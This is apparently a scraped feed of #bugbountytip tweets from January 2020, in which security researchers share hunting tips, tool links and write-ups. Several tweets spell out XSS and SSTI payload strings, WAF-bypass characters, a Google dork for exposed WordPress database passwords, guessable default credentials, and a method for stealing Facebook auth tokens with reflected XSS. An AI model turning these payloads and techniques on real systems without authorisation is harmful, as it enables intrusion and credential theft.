Anshuman Pattnaik
@anspattnaik


2020-01-19 03:12:24
0 #BugBounty #bugbountytip Found many open ports for a target port 22 - ssh (required password) port 21 - FTP (required password) port 445 - SMTP (required password) port 53 - domain (Possible Dos attack) port 8443 - Admin login page (required password) Should I report it?
Kyle
@B3nac


2020-01-19 02:52:16
0 If the default login request is POST check in Burp if GET is allowed and append the post attributes. For example. https://example . com/login?&username=TotallySecure&password=hunter2 If there is no CSRF token $. #bugbountytip
myo ko
@nutronex


2020-01-19 02:41:59
0 #bugbountytips #bugbountytip tagged as duplicate after 2 weeks :) https://t.co/5aOJw8BEjE
thehackerlab.io
@the_hacker_lab


2020-01-19 00:03:03
2 Rewrote my recon bot to output to markdown and upload to a git server and I love it, next step is to make it a docker container so I can swarm all the wildcards #BugBounty #hackerone #bugcrowd #bugbountytip Only a few of the steps are shown here but add it to your workflow
thehackerlab.io
@the_hacker_lab


2020-01-18 23:45:21
0 Over 50 Domains with XSS found this week on an old AF public program.. then triaged by hackerone.. it was raining alert(https://t.co/7GXCCGXJgp) #bugbountytip Just keep looking....... the bugs are out there !
bugbountytip
@a_l_e_r_t_1_


2020-01-18 18:12:20
1 GET /xyz 404 NOT FOUND GET /xyz/abc 200 OK GET /xyz 403 FORBIDDEN GET /xyz/abc 200 OK Look everywhere !!! #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-18 16:45:48
0 Site: If a post get 1000+ report abuse then site will automatically delete post. h1_squirtle: Clicking the "Report Abuse Button" 1000 TIme. ============= BOOM Post Deleted ============= $$ 300 $$ Profile: h1/h1_squirtle https://t.co/lWhHQIrwEC #bugbountytips #bugbountytip
yodhha
@y0dhha


2020-01-18 12:45:49
0 Task: Find flag, and send your flag to me Hint: It looks like binary but it's not that Don't share your flag Flag Type - NULLCROWD*{} I'll post a solution when the challenge is closed Attachment: https://t.co/x0VIjoGjFT Password - nullcrowd* #bugbountytips #bugbountytip #ctf https://t.co/SXe1drnzLP
dark_warlord14
@dark_warlord14


2020-01-18 08:18:29
0 Guide on how to proxy https traffic from emulator via burpsuite. It works. https://t.co/su35MeoCU4 #bugbountytip
yodhha
@y0dhha


2020-01-18 06:22:31
0 Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application https://t.co/WQ22tfAnmm #bugbounty #bugbountytips #bugbountytip #bugbounty2020goals
yodhha
@y0dhha


2020-01-18 06:21:28
0 1) Cable Haunt Vulnerability Haunts Cable Modems Using Broadcom Chips https://t.co/TTH8SCVSqa 2) Testing for XSS (Like a KNOXSS) https://t.co/kvdt9AjTKQ 3) Hacking Java Deserialization https://t.co/MnvJmuTvaJ #bugbounty #bugbountytip #bugbounty2020goals
Jason
@zeroauth


2020-01-18 02:44:11
0 Want to hear a Bounty Hunter fail? my ImageTragick test payloads this entire time had a typo of my callback address, so this entire time testing image uploads were worthless, and I never documented where they were... #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2020-01-17 22:42:44
0 Click-to-copy feature for an API key? Check for x-frame-options / frame-ancestors. If you can frame the page you can clickjack the key with just a click and a ctrl-v. #BugBountyTip
thehackerish
@thehackerish


2020-01-17 18:00:06
1 #bugbountytip: If you are struggling to run #hashcat on your host, you may want to run it in #docker instead. I've had success with it, cracking 6 passwords in an assignment. https://t.co/S81qOwyOWs
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 17:17:15
0 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/1zOHSPhURn …
Karna
@karna__1


2020-01-17 17:06:08
0 #BugBountyTip #bugbountytips #infosec Yep. A huge difference indeed! When you feel all down and exhausted and messed up, just go get some sleep! Chances are you'll wake up the next day with a different kind of energy :) Take rest and get merry @ArchAngelDDay <3 https://t.co/HKXAMiM37m
B.S aymen
@depression0x01


2020-01-17 11:02:02
0 Anyone here is using RSS feeds ? and which channels are u following for being aware about new CVE's I can't find nist cve channel ? #Security #BugBounty #bugbountytips #BugBountyTip #RSS_FOR_ALL #CVE
Sayaan Alam
@ehsayaan


2020-01-17 08:02:07
0 Just Submitted a Critical Subdomain Takeover to Account Takeover Vulnerability.... Hope For the Best!!! #Hacked #bugbounty #BugBountyTip
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 06:34:36
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/ZBC76PiwTP
Paulos Yibelo
@PaulosYibelo


2020-01-17 05:26:30
2 This is one common way for me to find high severity auth bypass vulnerabilities in high profile targets. Example: https://t.co/9GffzeEp0m #bugbounty #bugbountytip https://t.co/mrgnQhnue5
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 01:20:06
2 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/8x01PWjpmW
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 00:50:46
2 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-17 00:15:30
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/qibBdtN35d
Mrityunjoy
@mitunjoy11


2020-01-16 17:06:55
2 #BugBountyTip When you are looking for bugs on a program, always check for the program's browser extensions, sometimes you can get some cool SSRF ;) https://t.co/b1a1zitFjS
siLLyDaDDy
@sillydadddy


2020-01-16 15:50:38
3 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/bqBhpeLOtz
Ammar Amer🇸🇾
@cry__pto


2020-01-16 13:34:57
4 Using CeWL to map a website to build a custom wordlist(for password crackers),using words and phrases scraped from the target web pages: cewl -v -d 2 -m 5 -w results http://xx.xx.xx.xx/home/ -d=Depth to spider -v=Verbose output -m=Minimum word length #bugbountytip #Hacking
intigriti
@intigriti


2020-01-16 13:02:13
36 So you believe UUID's are a sufficient protection against IDOR's? Think again! 🤦 Thanks for the #BugBountyTip, @securinti https://t.co/zx5Xn7iDrE
BSides Ahmedabad
@bsidesahmedabad


2020-01-16 09:02:11
4 Closing note of @stokfredrik at #bsidesahmedabad #bugbountytip #bugbounty #infosec https://t.co/eKeJK1PmYf
Ahmed M. Elhady
@Br3akm30ut


2020-01-15 20:04:58
5 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
dark_warlord14
@dark_warlord14


2020-01-15 17:08:32
0 inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles This google dork is scary as shit. #bugbountytip https://t.co/vWkHcHIMDN
@cr33pb0y
@theyiyibest


2020-01-15 06:56:09
0 Yay, I was awarded a $XXX bounty on @Hacker0x01! First RXSS of the year. Payload: [1].map(alert) https://t.co/7vrkzfnbNA #TogetherWeHitHarder #bugbountytip #wafbypass
Eduard Tolosa
@Edu4rdSHL


2020-01-15 05:54:39
0 @Docker The image size is just 41MB! Special mention to @Spaceprogrammer for the idea and initial dockerfile! #bugbounty #bugbountytips #bugbountytip #osint #recon #tools
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-14 23:52:49
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/FzqCz83DY3
bugbountytip
@a_l_e_r_t_1_


2020-01-14 22:05:09
0 Can I bypass it ? Any suggestions ? ( \ ) #bugbountytips #bugbountytip https://t.co/WshiSHcmrM
Hasan
@hasan_zmzm


2020-01-14 20:20:14
0 Simple #1 rule. #BugBountyTip https://t.co/rUq3znRuov
Nick || hunt4p1zza
@ngkogkos


2020-01-14 19:08:56
3 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/5KxNTLvx4l
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 17:50:39
2 Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
Zero Xyele
@zeroxyele


2020-01-14 17:50:29
0 Get intelligence alerts from your targets using by https://t.co/ceSFlbIYul! (@_IntelligenceX) #hackerone #hacker101 #bugbounty #bugbountytip #bugbountytips #bugcrowd #intelligence https://t.co/rj4FQavyU0
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 17:34:50
1 Active Directory Visualization for Blue Teams and Threat Hunters https://t.co/exGykctRyY Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
AkaaZaan
@AkaaZaan


2020-01-14 16:28:30
0 I am giving out $300 to the one who shares a working tip on bypassing Authorization bearer header. #Bugbountytip
robre
@_robre


2020-01-14 15:01:25
0 Create a list of interesting keywords for grep:
$ printf 'password\ntoken\nsecret\nusername\n' > ~/dict/words.txt
$ alias secgrep='grep -f ~/dict/words.txt'
$ secgrep -r somedir/
somedir/file.php: dbpassword: hunter2
#BugBountyTip #bugbountytips #hacking @TomNomNom
reconness
@reconness


2020-01-14 14:01:58
1 Working on screenshot Agents feature #bugbountytips #BugBountyTip #bugbounty2020goals
Mashoud1122
@mashoud1122


2020-01-14 10:21:07
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/NIuW4ennqY
Imran Parray
@CreedHackers


2020-01-14 09:57:31
0 @tirtha_mandal @synack @SynackRedTeam Since you have added #BugBountyTip as a hashtag in your tweet, I would like to know how this tweet is a bug bounty tip.
Israel Thomas
@IsraelThomas_7


2020-01-14 09:05:29
0 I just love SSL misconfigurations! :) #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 07:04:51
0 https://t.co/AQ1isKOUi5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #cybersecurity
Mourad
@SecuAudit


2020-01-14 04:03:59
0 I need someone who speaks Vietnamese. #bugbounty #BugBountyTip
Mashoud1122
@mashoud1122


2020-01-14 01:22:50
1 Using A Reflected XSS to steal FB Auth Tokens[increase impact] if login with facebook is available use the rxss to reflect the location hash. Put the rxss url in the facebook auth flow[ redirect_uri ]. See the magic view the pic for more #BugBountyTip #BugBountyTips #BugBountyTip https://t.co/xKExO8OAcp
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-14 00:58:52
0 Here is another write up for 2fa bypass. https://t.co/CDff0sKP0U … #hacking #bugbountytip #infosec #writeup
dark_warlord14
@dark_warlord14


2020-01-13 18:57:01
0 Hacked up alias for ffuf to store all search results so you can look at them later. #bugbountytips #bugbountytip https://t.co/uDTJUGMTj1
Nick || hunt4p1zza
@ngkogkos


2020-01-13 17:58:38
0 If a subdomain returns a default/under construction or dead page, it may still be worth to run it through @hacker_'s getallurl + @TomNomNom's concurl tools to request all URLs & identify any URLs with different response. See image for commands. #BugBounty #bugbountytip https://t.co/YNXB7uamRY
Numan ÖZDEMİR
@numanozdemircom


2020-01-13 17:57:25
0 Who wanna find Critical (P1) vulnerabilities just in 10 seconds? An easy bounty tip for you. [PHP] Exposing DB Credentials / HttpOnly Bypass / Full Path Disclosure https://t.co/t08E7xzvG5 #BugBounty #bugbountytips #bugbountytip
Ebrahim Hegazy
@Zigoo0


2020-01-13 13:11:57
11 #BugBountyTip When using #Nmap as part of your #Recon arsenal, make sure to add --data-length=50 (or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open). #TBC
Yadhavi
@PrincessYadhavi


2020-01-13 12:44:10
0 Can I report Exposed google map api key on @Bugcrowd platform program? Is it valid bug? #bugbounty #bugbountytip #bugbountytips
Arif Khan
@payloadartist


2020-01-13 11:56:33
1 I'm surprised at how often companies use these credentials in internal login panels: company_name company_name admin company_name employee_name (/github username/from LinkedIn/any public source) company_name #bugbounty #bugbountytip #infosec
Tirtha Mandal
@tirtha_mandal


2020-01-13 09:45:30
1 Thursday's full night hunting finally paid off by @synack. Good start of 2020. Thank you @synack @SynackRedTeam #xss #bugbounty #synack #srt #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/WQWiJCtNPD
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-13 09:22:00
0 When mapping an application, pay special attention to all HTTP requests (i.e. GET and POST), as well as every parameter and form field that is passed to the application. #BugBountyTip #CyberSecurity #infosec https://t.co/D9QWw9BxWm
Lokesh Sonagra
@Anonx_pro


2020-01-13 01:51:02
2 Top Bug Bounty Tools 1. Burp Suite 2. Vulnerability Lab 3. Google Dorks 4. DNS Discovery 5. WAPITI 6. INalyzeR #hackerone #hackers #hack #bugbounty #bugcrowd #python #sqlinjection #programmers #hacks #bugbountytip #ruby #indianhackers #ssrf #developers #bughunters #xxe #hacker
Jason
@zeroauth


2020-01-13 00:35:15
0 Just made a small blog post detailing how I used Frida to bypass SSL cert pinning on a custom cert pinning integration. App developer made their own function instead of using the X509TrustManager. https://t.co/OfYS6ofaBP #bugbountytip #bugbountytips
QSoloX
@QSoloX


2020-01-12 18:27:05
0 How common do you guys find http parameter pollution exploits? Just watched a video from @PwnFunction and was very intrigued about it. It's one of those things that even just a month ago I would have never thought to be possible. #bugbountytip #bugbounty #hacking
Petko D. Petkov
@pdp


2020-01-12 17:48:04
0 Access to the right tools makes a huge difference when doing pentests and bug bounty hunting. How do you know which tool is good/right? Here is the deal. Good tools ultimately save you time - loads of time. #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-12 13:28:27
0 OLD IS GOLD for @bobby6102000 HACKED NORD VPN OLD WD VERSION $$$$$$$$$$$$$$$$$ BOUNTY $500 $$$$$$$$$$$$$$$$$ READ HERE https://t.co/jSxpimqExU #bugbountytips #bugbountytip BTW BOBBY BRUH #IndiaRejectsCAA_NRC_NPR
Pratik Dabhi
@impratikdabhi


2020-01-12 13:18:08
1 Payload for testing XSS, SQLI, SSTI vulnerabilities. '"><svg/onload=alert()>{{7*7}} #Payload #XSS #SQLI #SSTI #BugBountyTip
WebSecurityIT
@WebSecurityIT


2020-01-12 12:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbount…
WebSecurityIT
@WebSecurityIT


2020-01-12 09:30:00
1 RT @godzilla74: Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
d0nut
@d0nutptr


2020-01-12 08:44:07
2 If example[.]com points to IP 1.2.3.4 and redirect to www[.]example[.]com but www[.]example[.]com doesn't point to anything (No A, AAAA, CNAME), try submitting your HTTP request to http://1.2.3.4/ with a "HOST: www[.]example[.]com" header. #bugbountytip #bugbountytips
WebSecurityIT
@WebSecurityIT


2020-01-11 20:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbount…
Rafael Cintra
@RafaelCintraSec


2020-01-11 17:24:37
0 shx_webgame - Solving CTF - Shellter Labs https://t.co/H5AZAr9OaR #hacking #ctf #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2020-01-11 17:00:01
11 New video incoming! 🚨 In this video, we talk APIs. What they are, where to find them, and most importantly how to test them for bugs! We cover: API recon, the most common API bugs and teach you how to find them #bugbountytip #BugBounty #CyberSecurity https://t.co/3hDwOizxwl https://t.co/kPHof1JHtp
yodhha
@y0dhha


2020-01-11 14:52:41
0 Awesome Hacking Tool Lists https://t.co/LauqqrTZ82 #bugbounty #bugbountytips #bugbountytip #android #webpentest #Malware #penteset
Fisher
@Regala_


2020-01-11 14:06:44
2 Tip that has been shared a thousand times but to reiterate: always make a video POC in your reports. It takes 2 minutes and you're covering your future self in case things get fixed, environment change, shit lits on fire. #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-11 03:29:38
1 One line to extract urls from a folder #bugbountytip grep -oriahE "https?://[^\"\\'> ]+" *
Abhishek 🕵️
@abhishake100


2020-01-10 17:55:32
2 I just published "My First RCE (Stressed Employee gets me 2x bounty 🤑)" #bugbounty #bug #bounty #bugbountytip https://t.co/11GF7bsr8J
Sourav Sahana
@kernel_rider


2020-01-10 15:34:51
0 Here is another write up for 2fa bypass. https://t.co/ORu7ZWvJjP #hacking #bugbountytip #infosec #writeup
Justin Farmer
@godzilla74


2020-01-10 15:14:02
0 Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-10 09:22:02
4 When doing search engine reconnaissance, do not limit testing to just one search engine provider, as different search engines may generate different results. 🧑‍🤝‍🧑👯 #pentesting #CyberSecurity #infosec #OSINT #BugBountyTip https://t.co/z3TAwSxZnB https://t.co/SD8uQVh5XC
Digital Business News
@DASummerCamp


2020-01-10 05:15:00
0 In this week's blog, iBaibhavJha writes about how he found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/SJLKTZSdRs
Nassec.io
@nassecio


2020-01-10 04:47:33
2 In this week's blog, @iBaibhavJha writes about how he found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/tYuY4jldiV
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-10 02:19:15
1 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/zUtp0QmdQK
Dr.FarFar 🇪🇬⁩⁦🇨🇦
@3XS0


2020-01-10 00:54:18
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/0GODNlKoK3
Daher Mohamed
@DaherMohamed4


2020-01-09 17:25:00
0 Approx 5k$ bounties for multiple Admin Blind XSS Injection. Thanks @IAmMandatory @Bugcrowd #bugbountytip #bugbountytips Used xsshunter tool for blind xss(s) https://t.co/3vBS224SI2
Renwa
@RenwaX23


2020-01-09 15:22:02
0 OnePlus Bug Bounty Program is Scam #bugbountytip
Oghenejivwe 🇳🇬🗯
@realOghenejivwe


2020-01-09 14:35:34
0 There are very few things on earth more frustrating than spending hourssssssss, looking for bugs and finding none..Worse still in a CTF program! 😐😑 #bugbounty #bugbountytip #bugbounty2020goals
LivEdOverflow 🔴🐸
@LivEdOverflow


2020-01-09 13:35:27
1 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @̶L̶i̶v̶e̶O̶v̶e̶r̶f̶l̶o̶w̶ @EdOverflow! https://t.co/IoLsH8w4aQ https://t.co/aK4FU9iZ6z
intigriti
@intigriti


2020-01-09 13:05:16
13 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @̶L̶i̶v̶e̶O̶v̶e̶r̶f̶l̶o̶w̶ @EdOverflow! https://t.co/bAE0snqYcZ
Rafin Rahman Chy
@rafinrahmanchy


2020-01-09 12:48:21
0 @intigriti It's not a #bugbountytip 😒
Larouanne Tristan
@Tr4LSecurity


2020-01-09 12:10:14
0 Following the release of the MavenDecoder, here is an article on how to use #maven repository, secure them, and unsecure them: https://t.co/etGTIW5Div #pentest #bugbountytip
Rushiikesh
@u1tran00b


2020-01-09 08:47:01
0 Thank you so much for the awesome swag @Bugcrowd.... Waiting for the P1 Warrior Level 3 swag pack now...😁😁....Thanks for being a great platform.... If you are a newbie start your journey with #Bugcrowd #bugbounty #bugbountytips #bugbountytip ❤️❤️ https://t.co/ndXSnTmFpN
Mufeed VH
@mufeedvh


2020-01-08 15:46:26
9 Hey all, I started a youtube channel on bug bounties, programming, and security. This is my first video, an intro about me and the channel. I hope you guys are into memes and stuff. :) https://t.co/U99UY5w2cR #bugbounty #bugbountytip #infosec
STÖK
@stokfredrik


2020-01-08 15:28:44
30 Bug Bounty hunters & Pentesters alike, they all love to run their own domain and DNS Servers to log Out of Band interactions caused by RCEs, XXE's SSRFs and blind requests. And now you can do that too! Better safe than sorry! https://t.co/BgEpHIzjZr #bugbountytip #infosec #howto https://t.co/W5DyPENH5z
Aman Mahendra
@amanmahendra_


2020-01-08 10:44:39
0 Thanks @Hacker0x01 for this amazing hoodie 😍🔥 #bugbountytip #togetherwehitharder https://t.co/pU6HqPMPC9
Ammar Amer
@cry__pto


2020-01-08 10:06:05
6 #BugBounty tools part (5): HTTPScreenShot:https://t.co/qIuJA1SuJW SubBrute:https://t.co/5i2SI5Dzn7 OnlineHashCrack:https://t.co/zkqBbBh4un Wfuzz:https://t.co/qCK5ghmU5H LinkFinder:https://t.co/k015xUNhCm aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Christian Folini
@ChrFolini


2020-01-08 09:25:13
0 Working on my first blog post of the year: fingerprinting the #OWASP ModSecurity @CoreRuleSet This is surprisingly difficult, but I do not like security by obscurity, so here we go! #WAF #CRS3 #BugBountyTip
m0z
@LooseSecurity


2020-01-08 01:06:16
6 Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbounty #infosec #CyberSecurity
Tragger Osbourne🧐
@OsbourneTragger


2020-01-07 17:40:48
0 I am reverse engineering the program I made a few years ago and trying to develop some exploits. I hope 🤞 I will find some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/NtQPLB8oZt
Tragger ⚡️☄️
@NyataraOsborne


2020-01-07 17:35:05
0 I am reverse engineering the program I made a few years ago and trying to develop some exploits. I hope 🤞 I will find some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/waG51ZWIUX
Arif Khan
@payloadartist


2020-01-07 16:38:14
0 Excellent article by @streaak on his recon methodology #bugbounty #bugbountytip https://t.co/UqLBT5AJ3r
AkaaZaan
@AkaaZaan


2020-01-07 16:31:07
0 I want file upload payloads. Anyone guide me to some repository? #bugbountytip
Cryptographer
@crypt0gr4ph3r


2020-01-07 14:55:43
0 #bugbountytip I don't know how and why, I changed the expired token value from xxxxb to xxxxB, and it works 🤣 #hackerone #bugcrowd #bugbounty #hacker101
Sanketh Sharath
@sharathsanketh


2020-01-07 13:20:48
2 The need for making notes and having an organized methodology in bug bounty hunting https://t.co/kgFctJB2PV #bugbounty #bugbountytips #bugbountytip #webhacking
Yassine Aboukir 🐐
@Yassineaboukir


2020-01-07 10:21:11
2 I like decompiling older versions of android mobile apps to find deprecated API legacy endpoints as well as hardcoded creds which are surprisingly valid most often. You may use this mirror website for that purpose https://t.co/coCgEd89ly #bugbountytip
Dewanand Vishal
@dewcode91


2020-01-07 05:29:34
0 People who don't know how to approach a target app in bug bounty. Please Read Web Application Hackers Handbook- Chapter4. #intigriti #bugbountytip
GokhanGK
@gkhck_


2020-01-06 20:34:59
2 My first bug bounty writeup. It was a bit inexperienced but I wanted to share :) #bugbountytips #bugbountytip #infosec https://t.co/JGLTMr4BMK
Ammar Amer
@cry__pto


2020-01-06 16:22:32
5 Practice part (3): https://t.co/WPU9fCoxTd https://t.co/ZwkDd9pnFd https://t.co/XUfNhHJFmk https://t.co/XrESMMzbPD https://t.co/e61c34U8tC https://t.co/vLZjeXTwtQ https://t.co/XHVhlnzJjb https://t.co/7okAXhgpZt #bugbountytip #Hacking #PenTest
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-06 13:42:55
0 Every Hacker Will Agree ! 📲🏆💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gesA7tYLqX
dark_warlord14
@dark_warlord14


2020-01-06 11:23:43
0 What can you do with ffuf? 1. Directory bruteforcing 2. Parameter discovery 3. Vhost bruteforcing 4. Parse waybackurls data filtered by status code, response length It's extremely fast. With 200 threads on 1gb ram VPS, I can get 1000 requests per second easily. #bugbountytip
Dan Cimpean
@DanCimpean


2020-01-05 23:11:44
0 GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties #bugbountytip #bugbounty #infosec https://t.co/ojMfeteDaT
Khaled Mohamed
@xelkomy


2020-01-05 22:06:43
2 Tool #XSpear is very great. @hahwul thanks very much for this tool😅😍 #bugbountytips #bugbountytip #infosec #xelkomy
Shaked Klein Orbach 🇮🇱
@shakedko


2020-01-05 21:28:25
2 First time I hear about AppBandit by @websecurify (https://t.co/w2W2Rt6205). Have you heard about it? Is it any good? UI seems nicer than Burp's #BugBounty #BugBountyTip #Infosec
yodhha
@s0umadip


2020-01-05 20:06:16
0 awesome-forensics:- A curated list of awesome forensic analysis tools and resources. https://t.co/v9MDCYiQnN #bugbounty #bugbountytips #bugbountytip #forensics https://t.co/bvm7JNYaw0
yodhha
@s0umadip


2020-01-05 19:49:57
0 Offensive Security Wireless Attacks - WiFu v3 https://t.co/i77ZcVJyiK InfiniteSkills - Mastering Python -Networking and Security https://t.co/PwaSg3aXtV Chosen Books for easiest road to OSCP from my experience https://t.co/8fnP5BkVBi #bugbounty #bugbountytips #bugbountytip
Tirtha Mandal
@tirtha_mandal


2020-01-05 13:44:26
2 I would like to thank my good friend @brutelogic for helping me to bypass WAF❤️❤️ It worked like magic. 😍 #xss #wafbypass #bugbountytip #bugbounty 😍
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:43:38
0 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:40:51
0 "--!><Script%20/K/>confirm(document.domain)</Script%20/K/> 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ '%22--%3E</style></scRipt><scRipt>alert('XSS')</scRipt> "><img src=x onerror=confirm(1);> #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 06:01:38
1 Stay #CyberSafe Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gyc6PziIKB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 05:57:33
0 Gmail ShortCuts ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pkHRBQI2KK
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 04:28:29
3 #OSCP Like VMS ! Let's #TryHarder ! Part 2 — Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ofajN5TlU9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 04:23:37
0 #OSCP Like VMS ! Let's #TryHarder ! Part 1 — Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/469VcpzzPb
android_security
@pwn0sec


2020-01-05 01:15:15
1 Learning Pentesting for Android devices https://t.co/AR2CVpCENh #bugbounty #bugbountytip #bugbountytips #android
bugbountytip
@a_l_e_r_t_1_


2020-01-04 16:11:56
